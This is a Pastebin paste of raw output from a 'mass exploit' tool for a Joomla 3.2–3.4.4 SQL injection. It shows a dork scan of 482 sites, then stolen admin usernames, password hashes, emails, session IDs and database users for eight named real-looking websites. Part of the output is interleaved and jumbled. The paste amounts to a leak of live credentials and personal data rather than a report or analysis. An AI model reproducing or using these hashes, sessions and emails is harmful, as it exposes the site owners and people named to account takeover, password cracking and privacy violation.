Advertisement
Guest User

Untitled

a guest
Oct 27th, 2015
342
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.12 KB | None | 0 0
  1. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  2. [Mass Exploit] Joomla 3.2 - 3.44 SQL Injection
  3. Vulnerability found by : trustwave.com
  4. CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858
  5. MakMan -- http://mukarramkhalid.com -- http://fb.com/makmaniac
  6. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  7.  
  8.  
  9. [+] Starting dork scanner for : inurl:index.php?option=com_*
  10. [+] Total URLs found : 482
  11. [+] URLs written to urls.txt
  12.  
  13. [+] Trying Joomla SQL Injection exploit on 482 urls
  14. ------------------------------------------------
  15.  
  16. [+] Url : http://birchcc.org/index.php/component/k2/itemlist/user/258875
  17. [+] User : cl12-birchnew@10.0.1.46
  18. [+] Version : 5.5.35
  19. [+] tbl_prefix : b15ow_
  20. [+] Username : angus
  21. [+] Password : $2y$10$lUgVrwpNBDMYexBmSzZ9t.0JCORpWjsf8/bi2uIvE5a3qnyRHYqqe
  22. [+] Email : angus@gapcsupport.co.uk
  23. [+] Session Id : j50v8h9gdfieskmn896u363fp4
  24.  
  25. ------------------------------------------------
  26.  
  27. ------------------------------------------------
  28.  
  29. [+] Url : http://www.ftc.sc/index.php/component/k2/itemlist/user/9112
  30. [+] User : ftc_dtadm@localhost
  31. [+] Version : 5.1.73-cll
  32. [+] tbl_prefix : ftqno_
  33. [+] Username : admin
  34. [+] Password : $2y$10$7b6RxmKp3EXDHZCA0S7.N.kg6eWwgx4ydFFHXOahQug/6rHIRXPka
  35. [+] Email : eltonpiko@yahoo.co.uk
  36. [+] Session Id : 97b976049d12646bc42b4215ee84121f
  37.  
  38. ------------------------------------------------
  39.  
  40. ------------------------------------------------
  41.  
  42. [+] Url : http://flowcode.info/index.php
  43. [+] User : braun_jom3@localhost
  44. [+] Version : 5.1.68-cll-lve
  45. [+] tbl_prefix : jom3_
  46. [+] Username : admin
  47. [+] Password : $2y$10$9MyXxyjrZpFRoanRnW7L4OrXi3PKJAXkGcw.1k5vjQmLwHxmGWTlK
  48. [+] Email : info@flowcode.info
  49. [+] Session Id : pt90r8fnt3fj9o1uf82mi6io37
  50.  
  51. ------------------------------------------------
  52.  
  53. ------------------------------------------------
  54.  
  55. [+] Url : http://www.oxintstudycentre.com/index.php
  56. [+] User : oiscwww@localhost
  57. [+] Version : 5.5.44-0ubuntu0.14.04.1
  58. [+] tbl_prefix : eth_
  59. [+] Username : shawnv15
  60. [+] Password : 6abcf8393eddd4135b6923e36471a6fd:Da9Ufe1Mtt43M1uBBfbraG9e04qkY3
  61. ZI
  62. [+] Email : shawn@joomlawebwise.comv15
  63. [+] Session Id : 3eag12cu5ui0cvhqt8frth8a75
  64.  
  65. ------------------------------------------------
  66.  
  67. ------------------------------------------------
  68.  
  69. [+] Url : http://in-jir.com/index.php/component/k2/itemlist/user/37495
  70. [+] User : injir_user@localhost
  71. [+] Version : 5.5.45-37.4
  72. [+] tbl_prefix : ml8yx_
  73. [+] Username : adminjir
  74. [+] Password : $P$Dod47J7kpCIms94IpSTtrnU5IGPtc3.
  75. [+] Email : info@in-jir.com
  76. [+] Session Id : sbkqbnblm3oepp3lies6pn6bs6
  77.  
  78. ------------------------------------------------
  79.  
  80. ------------------------------------------------
  81. ------------------------------------------------
  82. ------------------------------------------------
  83.  
  84.  
  85. [+] Url : https://www.tahoerimtrail.org/index.php/support-the-trail
  86.  
  87. [+] User : tahoerim_tahlive@localhost
  88. [+] Url : http://www.upaep.mx/index.php
  89. [+] Url : http://galsltd.ru/index.php/component/k2/itemlist/user/14669
  90. [+] Version : 5.5.42-37.1-log
  91. [+] User : pisql@localhost
  92. [+] tbl_prefix : jml_
  93. [+] Username :
  94. [+] Password :
  95. [+] Email :
  96. [+] Session Id :
  97.  
  98. ------------------------------------------------
  99.  
  100. [+] User : gb_gls_new@81.177.49.5
  101. [+] Version : 5.5.33-cll-lve
  102. [+] Version : 5.5.35-rel33.0-log
  103. [+] tbl_prefix : upaep_
  104. [+] tbl_prefix : o9t48_
  105. [+] Username : pi.upaep.joomla
  106. [+] Username : admin
  107. [+] Password : f57aefaa05e9af79815e82db53d82762:385e2Db5G6ut6Q5OpUntNAxmhKZLnE
  108. uc
  109. [+] Password : $2y$10$XykUK4B22nEm7bRcOYnkLONTThQ77b3N2aRJ8z4JQK4Xou/3Gk2X.
  110. [+] Email : web@upaep.mx
  111. [+] Email : imv@svetcom.ru
  112. [+] Session Id : cn4vmdi5i7lu8e80oob9hetsu6
  113. [+] Session Id : 47e5a03r6f99afku70rfljmat4
  114.  
  115. ------------------------------------------------
  116.  
  117. ------------------------------------------------
  118.  
  119.  
  120. Total URLs Scanned : 482
  121. Vulnerable URLs Found : 8
  122. Script Execution Time : 156.95878314971924 seconds
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement